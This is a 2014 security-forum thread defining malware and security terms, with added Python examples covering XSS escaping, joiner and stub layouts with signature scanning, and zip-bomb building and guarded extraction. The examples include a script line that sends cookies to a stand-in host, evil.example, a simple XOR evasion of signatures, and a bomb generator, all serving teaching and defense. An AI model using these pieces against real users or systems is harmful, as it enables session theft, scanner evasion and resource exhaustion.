Security Dictionary

Discussion in 'General Security Discussions' started by Cowpipe, Jun 26, 2014.

  1. Cowpipe

    Cowpipe New Member

    Jun 16, 2014
    #1 Cowpipe, Jun 26, 2014
    Last edited: Jul 19, 2014
    Hello, I have tried to put together a wide array of terms that are used in the security community and may occasionally crop up on this forum without explanation. As with any author-written dictionary the definitions are infused with my own personal experience; also be aware that in trying to simplify some of the technical explanations I may have left important information out, so let me know if that's the case.

    The list is pretty short so far, but I'm hoping that if anybody has a term to add, or sees a definition I've got wrong, they'll let me know either in a reply or in a PM etc. For those of you not well-versed in the technical terms I hope this will be an interesting read :) I'll be working on adding new terms (a lot of obvious ones are missing...), cleaning it up and generally improving it as my labour of love :p Hope you enjoy it.

    1337: The leet spelling of leet.

    Adware: A program that is designed to present advertisements to you. These usually take the form of links being displayed on legitimate websites (for example, links to online pharmacies appearing on the usually ad-free Google homepage), pop ups and any software that appears to serve the sole purpose of extracting money from you. When people refer to BHOs and toolbars, they are normally referring to adware. Note that Scareware is classed by some as a type of adware.

    Anti-Malware: Software that specialises in removing malware and trojans from your computer. True anti-malware programs such as MalwareBytes Anti-Malware are different from Anti-Virus programs (See below)

    Anti-Spyware: The same as above, however specialises in removing spyware, which usually includes Adware and PUPs.

    Anti-Virus: Software that protects your computer from malicious software. There is much debate and confusion in the community about which anti-virus is the best; however, it's often not fair to compare certain products. Anti-virus software is a more general program which aims to remove all known threats from your computer, whereas some programs are more specialised; these include "anti-rootkit, anti-malware and anti-spyware".

    AV: Short for Anti-virus

    Backdoor: A program, normally called a trojan or 'server', designed to grant a hacker or operator access to your computer. The backdoor works by listening for special commands sent from the control program to your IP address, instructing the server portion to do anything from logging passwords, recording your webcam, taking screenshots etc., depending on what abilities were programmed into the server. Note that server in this context refers to the actual malicious file on your computer and not to a 'server' on the internet. The hacker's control panel is usually called a client.

    Binder: See Joiner

    Code: The word code is used almost exclusively in the underground community to refer to either the source code of a program, or as another word for program (to write a piece of code).

    Crypter: Also known as executable encrypters, the aim of a crypter in the hands of malicious parties is to obfuscate the contents of the file to prevent disassembly and debugging. Think of this as the difference between reading this sentence, and reading \[th]%@***+[is] se-&^nt20enc2008e2&21][*7. There are two forms of crypters, "Scan-Time" and "Run-Time"; the latter is the most sought after as the executable code is protected in memory. In order to run, an executable's code has to be unpacked and loaded into memory; in its unpacked state the code is vulnerable to attack as the analyst can simply make a copy of it, therefore run-time crypters employ more advanced techniques to avoid this practice, known as 'dumping' (copying memory contents to a file). A scan-time crypter simply protects until it is run, when it decrypts the malicious file into memory (or a temporary file on disk). Anti-virus scanners typically include modules to deal with these kinds of files by running them in a sandbox to scan the unprotected contents.

    Dropper: Normally called a Trojan Dropper, any file or code which downloads or 'drops' a file or files onto the user's computer.

    Fork Bomb: A piece of code which is designed to continuously replicate itself until all the computer's resources have been exhausted, for example a process which continually launches itself as a new process. Some zip bombs are also considered fork bombs, especially where they aim to unpack multiple layers of gigantic files, designed to exhaust all of the disk space or memory on your computer (whichever runs out first).

    FUD: Short for Fully Undetected or Fully Undetectable. Referring to a piece of malware meaning no anti-virus can currently detect it. See also UD and SUD.

    HEUR: Short for Heuristic. Refers to generic patterns which are matched against malware samples to indicate the likelihood that sample is malicious.

    Heuristic: As above.

    IM: Instant messenger, for example MSN Messenger or Windows Live Messenger.

    IRC: Internet Relay Chat. Private IRC chatrooms are popular amongst the underground community, normally hosted on private servers, multiple people can join a channel (individual chatroom) and talk at once.

    IRC Bot: A remote administration program which receives commands through an IRC channel.

    JS: Short for JavaScript

    JavaScript: A scripting language (see below) which is used to control the interactive (aka dynamic) features of a website. It is processed not by the server, as with PHP, but by your browser. JavaScript viruses are not compiled and are therefore usually obfuscated to frustrate attempts to detect any malicious activity in plain sight. As JavaScript is interpreted by the browser, it can also be run as a URL in the address bar. The user copies and pastes code into their address bar, giving the JavaScript code access to anything on the webpage the user is browsing. This has been used prominently in the past on social media to cause users to automatically post malicious links to all of their friends' profiles, for example.

    Joiner: A program used to package together multiple files into a single file (or container). Typically used to package a backdoor with a legitimate file, so that when you run the legitimate program, the trojan is also extracted and run without your knowledge. See "stub" for details on how this works.

    New School: Used to describe a person belonging to the new generation of hackers and virus writers. The term is generally derogatory as it's thought most new schoolers are 'script kiddies'. Some people also include those hackers and virus writers who operate exclusively for money in this category.

    n00b/Newbie: A usually derogatory term used to describe someone inexperienced. n00bs are especially prone to annoying less tolerant members by asking what are often 'obvious' questions.

    Obfuscation: Unobfuscated code is normally fairly readable, allowing the analyst to 'follow along' and understand how the program operates. The point of obfuscation is to frustrate these attempts, whether to discourage stealing (ripping) or prevent malware researchers from detecting malicious activity.

    Oldskool: Used to describe a person who shares the attitude and culture of the early hackers and virus writers. The exact definition of this is generally a personal view; however, the general consensus is that an 'oldskooler' is someone who obsessively seeks knowledge. An oldskooler will generally dissect a system to find its weaknesses and will reward themselves by exploiting those weaknesses. Notoriety and demonstrating this knowledge is often part of the fun.

    Packer: Different from a crypter in that the main goal is not to protect against anti-viruses by encryption but simply to reduce the file size.

    Phishing: A fake website, program, email or application disguised as legitimate and used for the purpose of gaining personal information (usually passwords & bank account details) from the user. Lesser known phishing scams also affect the underground community (typically script kiddie hangouts), in the form of fake tools and programs. The mid 2000s saw an influx of fake "Freezers" and "booters" designed to steal usernames and passwords from IM services such as Yahoo and MSN.

    Popup: A popup or pop-up ad can take three forms. Popup is used to describe an advert that opens in a new window or tab. Pop-over is used to describe an advert that appears right in front of the website itself, obscuring your view of it; these are often particularly difficult to close. And pop-under is used to describe an advert that appears behind any open webpages, the intention being that as you don't notice it right away, you will be more likely, on discovering it, to stop, look and think "what's this?" as opposed to closing another annoying pop-up without thinking.

    Rar Bomb: See Zip Bomb

    Ripper: Someone who steals code and passes it off as their own, usually with little modification other than replacing the authors name with their own.

    Root: Refers to an account with the highest possible privileges on a computer or server. Should a virus or hacker "get root" they can do pretty much anything they like.

    Leet: Referring either to "leet speak" meaning t0 r3pl4c3 l33t3r5 w1th numb3rs or referring to an especially skilled person "elite". Note that it is generally regarded by most as rather childish to label yourself as leet or elite, this behaviour is common amongst new schoolers.

    Scene: The scene is a name for the culture and collective of hackers and virus writers. Some people will refer specifically to a subsection, for example virus writers as the vx scene.

    Script Kiddie: Someone who is interested in writing viruses and spreading malicious code for fun and to cause mayhem and destruction but uninterested in how they work. Script kiddies almost exclusively use tools and kits to produce viruses, use pre-made RATs, password stealing kits and crypters. These people are also called skids & skiddies.

    Signature: An anti-virus signature is a small sequence of bytes (e.g. the computer's version of the alphabet) which can uniquely identify a malicious file. It can also refer to a hash (a unique sequence of letters and numbers, like a fingerprint) which identifies either a whole malicious file, or just a portion of it (a particular 'section' in the executable file).

    Stub: Refers to a small executable in a crypter, packer or joiner that unpacks the main contents of the file. Usually a specific marker or 'offset' (pointer to a specific part of a file) tells the stub what data is to be loaded into memory or extracted to disk. For a visual example, imagine that || means the boundaries of a file (the container) and the @split@ is the end of the stub program and the beginning of the malicious program inside. ||[STUB DATA]@split@[FILE1 DATA]||

    SUD: Submission of Undetected (samples) Done, refers to submitting a file for analysis to anti-virus companies which do not currently detect the file as malicious.

    Trojan: Short for Trojan Horse. General term for a malicious program which does not have the ability to replicate. Trojans are normally sub-categorised according to their ability. For example a Trojan PSW will steal passwords whereas a Trojan Dropper will download malicious files to your computer.

    UD: Undetected or Undetectable, different from FUD in that some anti-virus programs may detect the file as malicious.

    Virus: A virus traditionally is any piece of malicious code that has the ability to infect other files on your computer. There are multiple types of viruses, known as prependers, appenders, inserters and over-writers. It was considered poor for a virus writer to produce an over-writer virus, that is one that simply replaces files on your computer with a copy of itself. Prependers and appenders attach the virus code (or a specific infection code, or sometimes just text) to the beginning of the file and the end of the file respectively. An inserter virus places its code at a random position in the file. This technique is designed to reduce the possibility of detection by anti-virus and also to make the file harder to disinfect (remove the virus code and restore the file to its original state). These terms refer to the physical position of the code within the file, not to whether the virus runs before the main program or after, as nearly all viruses patch the "original entry point", meaning the first piece of code to execute when you run the file becomes the virus's code, which will then decide whether to let the program continue as normal or not. Additionally viruses can also be considered 'polymorphic' or 'metamorphic'; a polymorphic virus has the ability to change the order its code is run in, whereas a metamorphic virus can actually re-write its code, becoming a 'technically different' virus from the point of view of an anti-virus. Both techniques were employed to frustrate attempts by anti-virus programs to detect and remove viruses.

    VX: Slang for virus.

    XSS: Cross site scripting. An attack whereby malicious commands (usually HTML or JavaScript) are passed to a web server and executed. Client-side XSS attacks require the attack to cause a user to copy and paste malicious code into the address bar; this code can add, for example, a malicious iframe (a malicious website can be 'embedded' in the webpage you are viewing) without your knowledge. This form of attack usually relies on malicious input being passed to a PHP file on the server, for example the file can be requested as vulnerable.php?=[our code here], causing our code to execute if the input is not 'sanitized' or filtered properly (the ?= at the end of the php file means we can pass information to a file on the server, in the URL). Server-side XSS means that the same malicious code can be "injected" into a webpage, for example a comment box that allows the use of certain HTML tags, for example <b></b> to make text bold. If the comment box does not properly filter the content, we can include a <script> tag which allows us to run JavaScript. Thereafter whenever another user views our comment on the page, the server will also load the JavaScript, allowing, for example, links to be spammed to us and much more.

    ZIP Bomb: A malicious Zip file which is designed to cause your computer or anti-virus to crash upon opening. Because of how the compression algorithms in a zip file work, repeated data, for example "aaaaaaaaaaaaaaaaaaaa", can be dramatically reduced in size, meaning a file containing just repeated data over a terabyte in size can be compressed to as little as 40kb. Some Zip bombs employ a different approach and are crafted specifically to contain a second zip file within the first (zip in a zip); this second zip file does not, however, contain any further files, but instead a link back up to the top zip file, creating an endless loop. This technique is designed to cause anti-virus programs to crash when trying to unpack. Whilst the technique was popular many years ago, most modern anti-viruses contain counter-measures against these practices.

    Note: This list is currently quite small and random. I will add more terms in the next few days (as of 07/20/14)
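As an added example that is not part of Cowpipe's post: the Python below renders a comment-box entry the two ways the XSS entry contrasts, pasted straight into the page (the attacker's <script> survives) and HTML-escaped (it becomes inert text), plus an allowlist that re-enables only <b>, and the same pair for a value echoed back from a URL query parameter. The comment text, the page markup and the evil.example host are constructed for the demo. In common usage the comment-box case is called stored XSS and the URL-parameter case reflected XSS.

```python
import html
from urllib.parse import parse_qs

# Constructed sample input: one hostile comment and one harmless one.
ATTACKER_COMMENT = ('Nice post! <script>document.location="http://evil.example/?c="'
                    '+document.cookie</script>')
BENIGN_COMMENT = 'I <b>really</b> like this & that'


def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: user text is pasted straight into the page markup, so a
    # <script> tag submitted through the comment box runs in every viewer's browser.
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    # Hardened: escape <, >, &, " and ' so the browser treats the text as text.
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_comment_allow_bold(comment: str) -> str:
    # Escape everything first, then re-enable the one attribute-free tag we permit.
    # Allowlisting after escaping means nothing else can sneak through.
    escaped = html.escape(comment, quote=True)
    escaped = escaped.replace("&lt;b&gt;", "<b>").replace("&lt;/b&gt;", "</b>")
    return f'<div class="comment">{escaped}</div>'


def render_search_unsafe(query_string: str) -> str:
    # Reflected case: the 'q' parameter from the URL is echoed back unescaped.
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<p>Results for {q}</p>"


def render_search_safe(query_string: str) -> str:
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<p>Results for {html.escape(q, quote=True)}</p>"


def has_live_script_tag(markup: str) -> bool:
    # Check used to compare the renderers: does a real <script> tag survive into the output?
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACKER_COMMENT))
    print(render_comment_safe(ATTACKER_COMMENT))
    print(render_comment_allow_bold(BENIGN_COMMENT))
    print(render_search_safe("q=%3Cscript%3Ealert(1)%3C/script%3E"))
```

The escaping happens at output time, in the renderer, not when the comment is stored: the same stored string is harmless or not depending only on how it is written into the page.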
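As an added example, not from the thread, serving both the Joiner/Stub entries and the Signature entry: the Python below builds the ||[STUB DATA]@split@[FILE1 DATA]|| container described under Stub, shows the edge case where a payload itself contains the marker bytes, then a trailer-based layout (offset/length table at the end of the file) that does not have that problem, and finally a miniature signature scanner (one byte-pattern signature, one SHA-256 whole-file hash) run over the extracted payloads, plus the one-line XOR "crypter" that defeats both. The stub, the files, the deadbeef pattern and the Demo.* names are all constructed stand-ins, not real programs or a real AV database.

```python
import hashlib
import struct

SPLIT_MARKER = b"@split@"

# Constructed stand-ins: none of these are real executables, real malware or a real AV database.
STUB = b"STUB: pretend this is the small loader program"
LEGIT_FILE = b"LEGIT: pretend this is a harmless program"
TROJAN_FILE = b"TROJAN: pretend this is a backdoor server " + bytes.fromhex("deadbeef") + b" end"


def join_with_marker(stub: bytes, files: list) -> bytes:
    # Layout from the Stub entry: ||[STUB DATA]@split@[FILE1 DATA]@split@[FILE2 DATA]||
    return stub + b"".join(SPLIT_MARKER + f for f in files)


def stub_extract_by_marker(container: bytes) -> list:
    # What the stub does at run time: everything after its own end marker is payload.
    # Weakness: any payload that happens to contain the marker bytes is split in two.
    return container.split(SPLIT_MARKER)[1:]


def join_with_trailer(stub: bytes, files: list) -> bytes:
    # Robust layout: [stub][file1][file2]...[(offset,length) table][count][magic].
    # The stub reads the table from the end of its own image, so payload content never matters.
    body = bytearray(stub)
    table = b""
    for f in files:
        table += struct.pack("<QQ", len(body), len(f))  # offset, length
        body += f
    return bytes(body) + table + struct.pack("<I", len(files)) + b"JOIN"


def stub_extract_by_trailer(container: bytes) -> list:
    if container[-4:] != b"JOIN":
        raise ValueError("no joiner trailer present")
    (count,) = struct.unpack("<I", container[-8:-4])
    table_start = len(container) - 8 - 16 * count
    if table_start < 0:
        raise ValueError("trailer claims more entries than the file can hold")
    files = []
    for i in range(count):
        off, ln = struct.unpack_from("<QQ", container, table_start + 16 * i)
        if off + ln > table_start:  # never trust offsets read from the file itself
            raise ValueError("entry points outside the payload area")
        files.append(container[off:off + ln])
    return files


# A signature database in miniature: one byte-pattern signature and one whole-file hash.
PATTERN_SIGNATURES = {"Demo.Backdoor.Pattern": bytes.fromhex("deadbeef")}
HASH_SIGNATURES = {hashlib.sha256(TROJAN_FILE).hexdigest(): "Demo.Backdoor.Hash"}


def scan(blob: bytes) -> list:
    """Return the sorted names of every signature that matches blob."""
    hits = {name for name, pattern in PATTERN_SIGNATURES.items() if pattern in blob}
    digest = hashlib.sha256(blob).hexdigest()
    if digest in HASH_SIGNATURES:
        hits.add(HASH_SIGNATURES[digest])
    return sorted(hits)


def xor_crypt(blob: bytes, key: bytes) -> bytes:
    # The simplest possible scan-time "crypter": the stored bytes no longer match either
    # signature, and only the stub's decrypt routine (the same XOR) restores them at run time.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


if __name__ == "__main__":
    container = join_with_trailer(STUB, [LEGIT_FILE, TROJAN_FILE])
    for payload in stub_extract_by_trailer(container):
        print(payload[:6], scan(payload))
    print(scan(xor_crypt(TROJAN_FILE, b"\x5a")))
```

The whole-file hash only fires on the exact trojan bytes, so scanning the container as one blob finds the byte pattern but not the hash; that is why scanners unpack joiners and crypter stubs before matching.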
  2. Malware1

    Malware1 New Member

    Sep 28, 2011
    I will correct SUD. It's Submission of Undetected (Samples) Done.

    Good article anyway. :)
  3. Dani Santos

    Dani Santos From Xvirus

    Jun 3, 2014
    Windows 10
    Nice work and info!
  4. Cowpipe

    Cowpipe New Member

    Jun 16, 2014
    Thanks, couldn't remember the exact name but I knew it was referring to new samples being submitted :)
  5. kmr1684

    kmr1684 Level 3

    Jun 23, 2014
    Thanks, I can bookmark this page until I need a reference or forget some of it in the near future. Thanks once again for taking the time and energy to organize and sort it out in a well-versed manner. :)
  6. Cats-4_Owners-2

    Cats-4_Owners-2 Level 37

    Dec 4, 2013
    Southern California (east of Los Angeles)
    Windows 10
    I propose the term CowPipe, from this time forward, refer to malware that has been detected and thoroughly dispatched.
    Example: "Oh, my! My system's working like new!! He really CowPiped that infection!".:p:D
  7. King Mellow

    King Mellow Level 25

    Jun 21, 2013
    Manila, Philippines
    Windows 10
    Haha. You're always making me laugh, bro. :D
  8. Umbra

    Umbra Level 61
    Content Creator

    May 16, 2011
    Beta tester
    Europe > S-E Asia
    Windows 10
    very nice post.

    you can add :

    - Honeypot
    - Sniffer
    - Denial Of Service
    - Brute Force
    - Worm
    - steganography

    the list is long ;)
  9. Cats-4_Owners-2

    Cats-4_Owners-2 Level 37

    Dec 4, 2013
    Southern California (east of Los Angeles)
    Windows 10
    #9 Cats-4_Owners-2, Jun 27, 2014
    Last edited: Jun 27, 2014
    "The list is long;)"
    ..and continues.:cool:

    RDV = Rendezvous!

    Let us not forget Umbra = Umbra Corp/Umbra Total Security & Master of The Dark Side of "CowPiping", none of which should be confused with the Italian name on the breast of my discount-priced start-up jacket, "Umbr(-o)", which, in fact, has absolutely nothing whatsoever to do with computer system security;) ..unless, of course, I wrap one of our laptops in it to act as a heat, dust, and fur barrier!:p:D

    PS (update) An example of the valuable info learned here: While watching the TV game show Jeopardy, "Internet Billy Goats avoid this type of unpleasant creature who lurks beneath bridges..",;) I was able to impress my wife with o_O"What is a Troll?"!!:D
  10. Chromatinfish 123

    May 26, 2014
    Canada/United States
    You forgot:
    A computer that generates zombie systems that attack other computers, to hide the real computer's identity.
    A group of computers that, well, infect other computers! It can be used with the developer's computer as the main controller or a more advanced hacker can use reflector computers to hide his/her identity (see Reflector). Each consumes a bit of bandwidth and CPU speed to form a mega-CPU and tons of bandwidth to infect other computers. Some hackers/developers do this solely for the fun of it, while others spy on the computer's info.
  11. Dani Santos

    Dani Santos From Xvirus

    Jun 3, 2014
    Windows 10
    People could suggest more and he could edit and add the suggestions. It's just an idea to make the dictionary bigger.
  12. Oxygen

    Oxygen Level 42

    Feb 23, 2014
    United States
    Windows 10
    This shall grow.
  13. Cowpipe

    Cowpipe New Member

    Jun 16, 2014
    You just reminded me, I need to update this :)
  14. Behold Eck

    Behold Eck Level 9

    Jun 22, 2014
    Data bomb: same as zip bomb.

    Regards Eck
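As an added example that is not part of Behold Eck's or Cowpipe's posts: the Python below builds the kind of zip bomb the ZIP Bomb entry describes (a single member of repeated bytes, here 16 MiB of zeros that deflate to roughly 16 KiB) and then the countermeasure a modern extractor or scanner applies: read the declared sizes from the central directory, refuse on an absurd compression ratio or total, and keep counting bytes while inflating because the directory can lie. The limits (100:1 and 64 MiB) are assumptions chosen for the demo; the self-referencing nested-zip variant the entry mentions is not built here.

```python
import io
import zipfile

MAX_RATIO = 100                 # assumed limit: refuse anything that inflates more than 100:1
MAX_TOTAL = 64 * 1024 * 1024    # assumed limit: never inflate more than 64 MiB in total


def build_zip(members: dict) -> bytes:
    """Build an in-memory deflate zip from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_zip_bomb(size: int = 16 * 1024 * 1024) -> bytes:
    # Constructed demo bomb: one member of zeros. Deflate collapses long runs,
    # so 16 MiB of zeros stores in roughly 16 KiB (about 1000:1).
    return build_zip({"payload.bin": b"\x00" * size})


def declared_sizes(zip_bytes: bytes):
    """(total uncompressed, total compressed) as claimed by the central directory."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
    return sum(i.file_size for i in infos), sum(i.compress_size for i in infos)


def compression_ratio(zip_bytes: bytes) -> float:
    declared, stored = declared_sizes(zip_bytes)
    return declared / max(stored, 1)


def guarded_extract(zip_bytes: bytes, max_ratio: int = MAX_RATIO, max_total: int = MAX_TOTAL) -> dict:
    """Return {name: bytes}, or raise ValueError before a bomb is inflated."""
    declared, stored = declared_sizes(zip_bytes)
    if declared > max_total:
        raise ValueError(f"declared size {declared} exceeds limit {max_total}")
    if declared / max(stored, 1) > max_ratio:
        raise ValueError(f"compression ratio {declared / max(stored, 1):.0f}:1 exceeds {max_ratio}:1")
    out = {}
    inflated = 0
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            chunks = []
            with zf.open(info) as fh:
                while True:
                    chunk = fh.read(64 * 1024)
                    if not chunk:
                        break
                    inflated += len(chunk)
                    # The central directory can lie, so count bytes as they actually come out.
                    if inflated > max_total:
                        raise ValueError("archive inflated past limit during extraction")
                    chunks.append(chunk)
            out[info.filename] = b"".join(chunks)
    return out


if __name__ == "__main__":
    bomb = build_zip_bomb()
    print(len(bomb), "bytes on disk, ratio", round(compression_ratio(bomb)))
    try:
        guarded_extract(bomb)
    except ValueError as err:
        print("rejected:", err)
```

Two checks are needed rather than one: the ratio check catches bombs whose headers are honest, while the running byte count catches archives whose headers under-report what the deflate stream really produces.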
  15. WinXPert

    WinXPert Level 24
    Trusted AV Tester

    Jan 9, 2013
    Graphic Artist
    Windows 7
    Qihoo 360
    All I can think of is clickjacker.
  16. Arakasi

    Arakasi New Member

    Jul 12, 2014
    Network Admin, IT Specialist, Security Enthusiast
    San Antonio, TX
    Sitting here thinking of terms not in this list was fun.
    Enjoy, and don't hesitate to PM me if you need assistance with definitions; I have just given you a lot of work to do.
    I know for a fact you don't need me to tell you what these are though, hahahah

    Boot sector
    Boot sector virus
    Trojan downloader
    Boot sector virus
    Master boot record
    Volume boot record
    Command and control server
  17. Maximum

    Maximum New Member

    Dec 20, 2014
    This isn't a bad security dictionary you got here!
  18. Korora

    Korora New Member

    Jul 22, 2015
    United States
    This is a really cool post!

    I even picked up on a few terms I haven't heard of before :)
  19. Mr. Tech

    Mr. Tech Guest

    Here are some you should consider adding to the list:
    HIPS - Host Intrusion Detection System
    BB - Behavior Blocker
    AM - Anti-Malware
    AE - Anti-Exploit or Anti-Executable
  20. willieaames

    willieaames New Member

    Sep 21, 2015
    San Fransisco
    very comprehensive, thanks for sharing...